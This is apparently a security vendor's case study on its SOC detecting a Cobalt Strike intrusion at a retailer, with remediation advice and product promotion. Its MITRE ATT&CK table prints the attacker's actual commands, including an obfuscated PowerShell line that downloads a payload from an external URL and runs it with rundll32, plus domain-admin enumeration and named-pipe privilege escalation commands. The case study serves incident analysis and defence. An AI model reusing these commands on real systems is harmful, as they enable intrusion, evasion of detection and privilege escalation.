MITRE ATT&CK Guides MSP on Cobalt Strike Threat Mitigation
The Network: A major retailer with over 2,500 employees and more than 100 stores and distribution centers is supported by an MSP who uncovered a cyber criminal weaponizing the legitimate IT tool Cobalt Strike for malware distribution.
The Expectation: Protect the retailer’s digital assets and sensitive data to maintain uptime and resiliency by avoiding malicious activity. Enable services like eCommerce that are crucial to retail organizations with supply chain partners and customers around the globe.
The Catch: The analyst team at Netsurion’s Security Operations Center (SOC) used the advanced logic to detect an obfuscated but suspicious PowerShell command. It was then followed by a named pipe command execution for impersonation and privilege escalation. Detailed investigation of the detected sequence showed a Cobalt Strike attack.
Cobalt Strike is an exploit tool used by defenders and hackers alike. It is powerful and flexible at simulating attacks and testing network defenses. Cobalt Strike is available for registration and sale on legitimate websites as well as found on the criminal underground.
The Find: Netsurion’s SOC detected every detail of this malware attack and provided the retailer with detailed remediation recommendations. The analyst uncovered a PowerShell running a dubious alert with a command line argument that appeared very suspicious as the parameter “DOWNLOAD FILE” was split as “D” + “Own” + “LOa” + “Dfi” + “le” to evade known detection controls. The legacy anti-virus was not sufficient to detect this threat tradecraft. Netsurion’s SOC analyst also noticed a URL in the command line argument.
Malicious Cobalt Strike Tactics and Techniques in MITRE ATT&CK:
| Creator Process Name | Suspicious Command Line Argument | Comments | Tactic | Technique | MITRE ATT&CK ID |
|---|---|---|---|---|---|
| cmd.exe | rundll32 b.dll,TstSec 11985756 | Suspicious DLL is loaded and ‘11985756’ is parameter passed to ‘TstSec’ function.Similar commandline arguments are involved in Cobalt Strike attack as shared by security research firms. | Defense Evasion | Signed Binary Proxy Execution | T1218.011 |
| cmd.exe | powershell -nop -c $ds = ”D” + ”Own” + ”LOa” + ”DfI” + ”le”; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke (”https://mail.pvpc.org/owa/auth/Current/lo.ttf”, ”C:WindowsTEMPou.ttf”) | File with extension .ttf getting downloaded at the location-”C:WindowsTEMPou.ttf”. (Windows Defender has detected threat as -‘Behavior:Win32/CobaltStrike.H!nri’) | Command and Control | Data Obfuscation | T1001 |
| cmd.exe | rundll32 C:WindowsTEMPou.ttf,lhdgbmas | Highly suspicious activity where rundll32 is loading a non DLL extension file and believed to execute malicious ShellCode. | Defense Evasion | Signed Binary Proxy Execution | T1218.011 |
| rundll32.exe | C:Windowssystem32cmd.exe /C nltest /dclist: | Enumeration commands executed | Discovery | Account Discovery | T1087 |
| rundll32.exe | C:Windowssystem32cmd.exe /C net group “Domain admins” /domain | Discovery | Account Discovery | T1087 | |
| rundll32.exe | C:Windowssystem32cmd.exe /C nltest /domain_trusts | Discovery | Account Discovery | T1087 | |
| rundll32.exe | C:Windowssystem32cmd.exe /C net group “Enterprise admins” /domain | Discovery | Account Discovery | T1087 | |
| rundll32.exe | C:Windowssystem32net1 group “Enterprise admins” /domain | Discovery | Account Discovery | T1087 | |
| rundll32.exe | C:Windowssystem32net1 group “Domain admins” /domain | Discovery | Account Discovery | T1087 | |
| svchost.exe | C:Windowssystem32cmd.exe /c echo a848bdcc925 > \.pipec20734 | Named Pipe command are executed to escalate priviledges(Windows Defender has detected threat as -‘HackTool:Win32/Named PipeImpers.A’) | Privilege Escalation | Access Token Manipulation | T1134 |
| svchost.exe | C:Windowssystem32cmd.exe /c echo 48e31e1d13a > //./pipe/2d6265″>\.pipe2d6265 | Privilege Escalation | Access Token Manipulation | T1134 |
Observation: On accessing the URL in a controlled sandbox environment, Netsurion detected a file downloaded by the Cobalt Strike Beacon. To check the reputation of the artifact, the SOC analyst uploaded the file to an IP monitoring service, which ranked it as having a poor reputation. Reputation intelligence on IP addresses helps protect users from known malware or connection to suspicious domains that may be hosting phishing attacks or malware.
The Fix: Netsurion’s security analyst promptly notified the MSP about the detections. Rapid action stopped the further spread of Cobalt Strike. All identified malicious hashes and IP addresses were immediately moved to an unsafe list for process termination on the infected system. The identified Cobalt Strike hashes were then added to Netsurion Threat Center, our threat intelligence repository, to assist in rapid detection across all Netsurion customers.
Recommendations to mitigate this Cobalt Strike malware include:
- Use strict password management and least privilege access policies
- Reinforce social engineering and anti-phishing awareness training
- Identify which systems, applications, and data lakes are mission-critical to your business and day-to-day operations and functions such as billing
- Implement frequent backups of crucial files and isolate them from local and open networks. Also keep offline backups of data stored in locations inaccessible from infected computers.
- Promptly patch software and applications and stay on top of vulnerability advisories
- Implement and practice a digital disaster recovery plan
- Monitor the attack surface with a 24/7/365 SOC
Netsurion’s security analyst continued to monitor the network for further infection and possible lateral movement.
The Lesson: With the rise in Ransomware-as-a-Service (RaaS), legitimate tools like Cobalt Strike are gaining traction with cyber criminals. Adversaries will likely continue to use legitimate cybersecurity tools to avoid detection. MSPs must remain vigilant as cyber criminals are persistent and ever evolving. It is also common for attackers to strike the same victims again who’ve demonstrated weak defenses. As a global and objective framework, MITRE ATT&CK is a structured way to learn from real-world adversaries. Netsurion’s Managed Open XDR offers defense-in-depth coverage and 24/7 monitoring that prevents the spread of this dangerous malware to other systems and devices.
What is Cobalt Strike and how does it work?
What is Cobalt Strike and how does it work? Cobalt strike is a weaponized software that deploys a difficult-to-detect beacon to a target. But how does it get onto your system and evade existing security control? How can you detect and decontaminate if you’ve been affected? Watch this 10-minute overview to find out.